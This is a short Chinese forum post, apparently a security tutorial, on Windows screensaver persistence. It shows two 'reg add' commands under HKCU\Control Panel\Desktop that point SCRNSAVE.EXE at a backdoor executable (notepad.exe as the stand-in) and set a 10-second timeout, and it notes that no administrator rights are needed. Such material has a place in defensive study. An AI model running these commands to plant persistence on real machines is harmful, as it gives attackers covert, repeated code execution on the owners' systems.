一、屏幕保护持久化
屏幕保护应该都知道, 这里的利用方式十分简单, 就是替换屏幕保护程序为自己的后门程序实现的持久化。这个操作不需要高权限用户即可实现替换, 普通用户即可。
注册表存在位置
[AppleScript] 纯文本查看 复制代码 HKEY_CURRENT_USER\ControlPanel\Desktop
具体操作
1.为屏幕保护创建一个注册表项并插入后门
[AppleScript] 纯文本查看 复制代码 reg add"HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\\windows\\system32\\notepad.exe" /f
2.再创建一个注册表项设置屏幕保护的超时时间决定什么时候启动屏幕保护程序
[AppleScript] 纯文本查看 复制代码 reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f # 设置超市时间为10秒
3.注销查看后门效果,根据设置的超时时间等待即可查看启动效果
| 
匿名
发表于 2024-5-18 16:27:09
